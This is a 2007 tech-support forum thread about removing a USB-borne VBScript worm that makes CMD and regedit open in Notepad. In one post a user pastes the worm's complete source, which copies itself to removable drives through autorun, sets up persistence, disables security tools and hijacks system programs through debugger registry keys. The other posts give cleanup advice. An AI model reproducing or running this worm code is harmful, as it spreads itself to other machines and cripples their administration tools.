CMD and REGEDIT opens with notepad!

Discussion in 'Security and Viruses' started by nailv, Oct 23, 2007.

  1. nailv
    Offline

    nailv New Member

    Joined:
    Oct 17, 2007
    Messages:
    15
    Trophy Points:
    4
    Ratings:
    +0 / 0 / -0
    hi,

    how can i remove the changes caused by a virus? something with a double extension, *.dll.vbs??

    i used the RRT and it removed the restrictions on run, task manager & folder options but CMD and regedit still opens with notepad!

    i wonder i updated my mcafee run a full scan on the flash drive i have inserted but it found nothing.

    my pc was infected right after i removed the flash drive from my computer.
  2. Guest Ads
    Online

    Google King of the Internet

  3. Raymond
    Offline

    Raymond Administrator Staff Member

    Joined:
    Nov 6, 2006
    Messages:
    8,845
    Trophy Points:
    280
    Ratings:
    +72 / 0 / -1
    Did you install the script from this article?
    http://www.raymond.cc/blog/archives/2007/07/01/stop-virus-from-running-automatically-when-you-execute-files/

    It should fix .bat, .com, .exe, .pif, .reg and .scr file. It will also re-enable your registry editor (regedit).

    Looks like you have an infected usb flash drive. Make sure you clean the virus in your usb flash drive first.
  4. nailv
    Offline

    nailv New Member

    Joined:
    Oct 17, 2007
    Messages:
    15
    Trophy Points:
    4
    Ratings:
    +0 / 0 / -0
    yes, i did. i copied the script from the page, paste it on notepad and saved it on my desktop then i right clicked it then clicked "install". i also restarted my pc.

    but how come it is still the same? Nothing happens.
    regedit.exe and cmd still opens with notepad. damn.

    i also run the RRT.
  5. Raymond
    Offline

    Raymond Administrator Staff Member

    Joined:
    Nov 6, 2006
    Messages:
    8,845
    Trophy Points:
    280
    Ratings:
    +72 / 0 / -1
    If the problem still comes back after restart, I suspect that there is still virus on your computer that's causing it.

    You can do this to verify.
    Install the script again. Then run regedit and go to the location:
    HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
    HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
    HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
    HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
    HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe ""%1"""
    HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"

    Check if the value is "%1" %*. If it's correct, restart.
    Once your computer is booted up, run regedit again and check the values.
  6. nailv
    Offline

    nailv New Member

    Joined:
    Oct 17, 2007
    Messages:
    15
    Trophy Points:
    4
    Ratings:
    +0 / 0 / -0
    It is STILL THE SAME.... even if i run into safe mode and installed the script again.
    I still cannot open the registry, command prompt and msconfig.

    i restarted my pc many times to no avail. i already removed vbscript file type in the folder options.

    also, IE's title bar has a phrase, "Doomed by Bewilder".

    I DONT want to reformat my pc. Pls help me out...
  7. nailv
    Offline

    nailv New Member

    Joined:
    Oct 17, 2007
    Messages:
    15
    Trophy Points:
    4
    Ratings:
    +0 / 0 / -0
    this is the script of the virus:

    Code:
    'Sting C
    
    on error resume next
    
    dim winpath,mysource,fs,atr,flashdrive,check,mf,tf,rg,nt,sd
    
    atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe wpzcon32.dll.vbs"
    
    set fs = createobject("Scripting.FileSystemObject")
    
    set mf = fs.getfile(Wscript.ScriptFullname)
    
    dim text,size
    
    size = mf.size
    
    check = mf.drive.drivetype
    
    set text=mf.openastextstream(1,-2)
    
    do while not text.atendofstream
    
    mysource=mysource&text.readline
    
    mysource=mysource & vbcrlf
    
    loop
    
    do
    
    Set winpath = fs.getspecialfolder(0)
    
    set tf = fs.getfile(winpath & "\wpzcon32.dll.vbs")
    
    tf.attributes = 32
    
    set tf=fs.createtextfile(winpath & "\wpzcon32.dll.vbs",2,true)
    
    tf.write mysource
    
    tf.close
    
    set tf = fs.getfile(winpath & "\wpzcon32.dll.vbs")
    
    tf.attributes = 39
    
    for each flashdrive in fs.drives
    
    If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
    
    set tf=fs.getfile(flashdrive.path &"\wpzcon32.dll.vbs")
    
    tf.attributes =32
    
    set tf=fs.createtextfile(flashdrive.path &"\wpzcon32.dll.vbs",2,true)
    
    tf.write mysource
    
    tf.close
    
    set tf=fs.getfile(flashdrive.path &"\wpzcon32.dll.vbs")
    
    tf.attributes =39
    
    set tf =fs.getfile(flashdrive.path &"\autorun.inf")
    
    tf.attributes = 32
    
    set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
    
    tf.write atr
    
    tf.close
    
    set tf =fs.getfile(flashdrive.path &"\autorun.inf")
    
    tf.attributes=39
    
    end if
    
    next
    
    set rg = createobject("WScript.Shell")
    
    rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WPZCON32",winpath&"\wpzcon32.dll.vbs"
    
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Doomed by Bewilder"
    
    rg.regwrite "HKEY_CURRENT_USER\vbsfile\DefaultIcon","shell32.dll,2"
    
    rg.regwrite "HKEY_CLASSES_ROOT\vbsfile\DefaultIcon","shell32.dll,2"
    
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","1","REG_DWORD"
    
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden","0","REG_DWORD"
    
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
    
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","1","REG_DWORD"
    
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","1","REG_DWORD"
    
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
    
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","1","REG_DWORD"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Don't Worry... Be Happy..."
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Bewilder"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\LegalNoticeCaption","Bewilder"
    
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\LegalNoticeText","Doomed by Bewilder"
    
    if check <> 1 then
    
    Wscript.sleep 200000
    
    end if
    
    loop while check<>1
    
    set sd = createobject("Wscript.shell")
    
    sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
  8. Raymond
    Offline

    Raymond Administrator Staff Member

    Joined:
    Nov 6, 2006
    Messages:
    8,845
    Trophy Points:
    280
    Ratings:
    +72 / 0 / -1
    Why can't I find any information about this Bewilder virus?
    nailv, may I know where did you get that code from?
  9. nailv
    Offline

    nailv New Member

    Joined:
    Oct 17, 2007
    Messages:
    15
    Trophy Points:
    4
    Ratings:
    +0 / 0 / -0
    i found it from C: of my collegue's PC. The virus was actually from removable flash drives.

    i think every usb flash drive is dwelled by viruses usually written in vbscripts.
    damn.

    Edit: wheww! at last! i've fix it already.

    thankz to expert folks on other forums.
  10. CloudJay
    Offline

    CloudJay New Member

    Joined:
    Jun 28, 2008
    Messages:
    1
    Trophy Points:
    1
    Ratings:
    +0 / 0 / -0
    hi raymond. I think i have the same problem with my laptop :( . The title bar on my internet explorer has a doomed by bewilder thing. And the note pad thing too. Ive already fix the task manager. Pls help me, i am desparately needing your help Raymond cause im a noob in computers. i cannot understand those complicated instructions that you have already given to fix my problems. What should I do? Pls help me by instructing me step by step what to do. Thanks Raymond :)
  11. brayden
    Offline

    brayden Prominent Member

    Joined:
    Jun 12, 2008
    Messages:
    3,700
    Trophy Points:
    166
    Ratings:
    +0 / 0 / -0
    try downloading winsecret from the freebies giverway topic in latest releases and when you have fininshed downloading it you run it go to applications and you can change the title in internet explorer